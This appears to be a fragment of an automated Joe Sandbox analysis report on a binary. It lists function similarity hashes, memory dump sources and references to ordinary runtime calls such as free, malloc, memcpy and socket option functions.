                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdupmalloc
                                            • String ID: identity
                                            • API String ID: 3515966317-1788209604
                                            • Opcode ID: f93b67b2edb0c97d754ad6eb4325252d7f86d04025bba17c1a817ce8625e0f09
                                            • Instruction ID: d7ce9d2e7717db3dd18807ad38351c6dca19a366d5b5438a7aaf8724d78e373e
                                            • Opcode Fuzzy Hash: f93b67b2edb0c97d754ad6eb4325252d7f86d04025bba17c1a817ce8625e0f09
                                            • Instruction Fuzzy Hash: 2831CA25F19A4A81EB05AF259560779EBA1EF54FE8F898132CE2D833D4DE3CE4418311
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: getsockoptsetsockopt
                                            • String ID: @
                                            • API String ID: 194641219-2726393805
                                            • Opcode ID: 0a02be26702a17fb24d673bc1c7a38ce0ab4c02e4837c5bb589101a8385174c8
                                            • Instruction ID: 7fe1e16ec30ab6b65ad3a68b72a4d2b9d45b007c059a2a9f203589b1fe03814e
                                            • Opcode Fuzzy Hash: 0a02be26702a17fb24d673bc1c7a38ce0ab4c02e4837c5bb589101a8385174c8
                                            • Instruction Fuzzy Hash: BE116371B1818A86E7109F11E410F7AFFA0FF80B48F940131DA4887A94DB7DD549CB11
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdupfree
                                            • String ID: %I64d-
                                            • API String ID: 1865132094-19666937
                                            • Opcode ID: 1b09a0f9ec2cdcf79c216dadba7648dfc26f4f2795125d582cdf8d7fb230f003
                                            • Instruction ID: b763c9e99bdd95c20f17795486c9fb63d35b459cc8a5ec0bbb3d68cbef02531f
                                            • Opcode Fuzzy Hash: 1b09a0f9ec2cdcf79c216dadba7648dfc26f4f2795125d582cdf8d7fb230f003
                                            • Instruction Fuzzy Hash: 37112972B16986C1EB10AB7894157F45BA2EF58F48F580036C90D8E251DE3D94968332
                                            APIs
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E59F87EA
                                            • memcpy.VCRUNTIME140 ref: 00007FF7E59F891C
                                            • memcpy.VCRUNTIME140 ref: 00007FF7E59F8938
                                              • Part of subcall function 00007FF7E5A0DDD0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E59F66F3,?,?,00000000,00007FF7E5A00FC2,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A0DE0C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freememcpy
                                            • String ID:
                                            • API String ID: 3223336191-0
                                            • Opcode ID: c4f4cead081543eee998664c6e26dde1d499f2edb648bd068f105d442ca860eb
                                            • Instruction ID: 6b5a88d725a65386932779e386eb03ff7db34bdbe634591dd3c63a5b79c1e98f
                                            • Opcode Fuzzy Hash: c4f4cead081543eee998664c6e26dde1d499f2edb648bd068f105d442ca860eb
                                            • Instruction Fuzzy Hash: FDC18C32B14A068AEB54AB65D4107FC77A1BB44BA8F844236CE2DA77C8DF3CD416C761
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdupfreemalloc
                                            • String ID: %s: %s
                                            • API String ID: 3985033223-1451338302
                                            • Opcode ID: 6fd051ae12b54f2a92270519f6d97962798999720b261752d85002a3e6645c6b
                                            • Instruction ID: e7e515607b0411bde23a38e667c4d4da9d8fb8533473f0d7c21278930b891daa
                                            • Opcode Fuzzy Hash: 6fd051ae12b54f2a92270519f6d97962798999720b261752d85002a3e6645c6b
                                            • Instruction Fuzzy Hash: DAF08151B0C68A81EA70AB52F824FA99B907F45F94FC80033CE4E973528F3CD1858322
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7E5A303A8), ref: 00007FF7E5A3D2A1
                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FF7E5A303A8), ref: 00007FF7E5A3D2B4
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7E5A303A8), ref: 00007FF7E5A3D2DB
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FF7E5A303A8), ref: 00007FF7E5A3D2E8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$freemalloc
                                            • String ID:
                                            • API String ID: 2605342592-0
                                            • Opcode ID: f423032592661c1c982721c03790951f0a4f6f553020798a1f396cad00f05043
                                            • Instruction ID: 1d746e7b2076aa440ca250f2a989c85674b30e36cf7b194774a303431b2e87da
                                            • Opcode Fuzzy Hash: f423032592661c1c982721c03790951f0a4f6f553020798a1f396cad00f05043
                                            • Instruction Fuzzy Hash: 6B117321B0874682E7209B5AF85056AEAA0FF88FD8B980536DB5E87B58DF3CD4508710
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: fb92b5897efe7a973630822f8ea6d2b801e1db37904bea41b264d208a555ce77
                                            • Instruction ID: 01fab81d16806a7b44d4e0b789aa0d4762e3d2dfd52edc6ac55bfd28fa1d44db
                                            • Opcode Fuzzy Hash: fb92b5897efe7a973630822f8ea6d2b801e1db37904bea41b264d208a555ce77
                                            • Instruction Fuzzy Hash: 1C11F436B09A45C1EB54AF25E860B3CB7A4FF94F88F944032CA4E42754CE3CD4548352
                                            APIs
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A3093E), ref: 00007FF7E5A34866
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A3093E), ref: 00007FF7E5A34887
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A3093E), ref: 00007FF7E5A348A2
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A3093E), ref: 00007FF7E5A348B0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 2124235a9113e76acb7eecb01da0754f535a2c886931aa00cef68c70ac2a9cfc
                                            • Instruction ID: 31d47524e55bcc545a0a51568140a250c2d66bbd6b2dc2f2f65a732a4c91844b
                                            • Opcode Fuzzy Hash: 2124235a9113e76acb7eecb01da0754f535a2c886931aa00cef68c70ac2a9cfc
                                            • Instruction Fuzzy Hash: 3C11BA36604B45C2DB04EF25E8A592CBBA5FF94F887504026CE4E83768CF38D895C391
                                            APIs
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A08405,?,?,00000000,00007FF7E5A010C1,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A321F0
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A08405,?,?,00000000,00007FF7E5A010C1,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A32216
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A08405,?,?,00000000,00007FF7E5A010C1,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A32224
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A08405,?,?,00000000,00007FF7E5A010C1,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A32232
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 49bcb4bd4df464ddd61e42b1f9edd509c5c3826315286159958ab8f391a2e4fd
                                            • Instruction ID: 73f1def55cdbd6d4c21004e11932ed06e7ddf90496a95f891226e7e6b0883b81
                                            • Opcode Fuzzy Hash: 49bcb4bd4df464ddd61e42b1f9edd509c5c3826315286159958ab8f391a2e4fd
                                            • Instruction Fuzzy Hash: 6AF0C936604B05C2DB049F21F9A5928B7B4FF98F887A14122CE9E83764CF38C4A4C351